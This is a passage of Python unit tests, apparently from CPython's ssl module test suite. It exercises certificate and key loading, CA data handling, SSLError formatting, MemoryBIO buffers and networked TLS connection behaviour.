# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
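# SSLError behaviour: str() formatting, the library/reason attributes set by
# OpenSSL, and selection of the appropriate SSLError subclass.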
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
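# ssl.MemoryBIO is the in-memory buffer used together with SSLObject/wrap_bio();
# these tests cover read/write ordering, EOF signalling, the pending byte count,
# accepted buffer types and argument errors.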
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
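# The tests below need outbound network access to REMOTE_HOST; each one runs
# inside support.transient_internet(), so transient connectivity problems are
# reported as skips rather than failures.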
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm changed between OpenSSL 0.9.8n
# and 1.0.0; as a result, the capath directory must contain both
# versions of each certificate (same content, different filename) for
# this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
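# TLS driven through ssl.MemoryBIO pairs: ssl_io_loop() shuttles bytes between
# the BIOs and a plain TCP socket until the wrapped SSLObject call completes.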
class NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
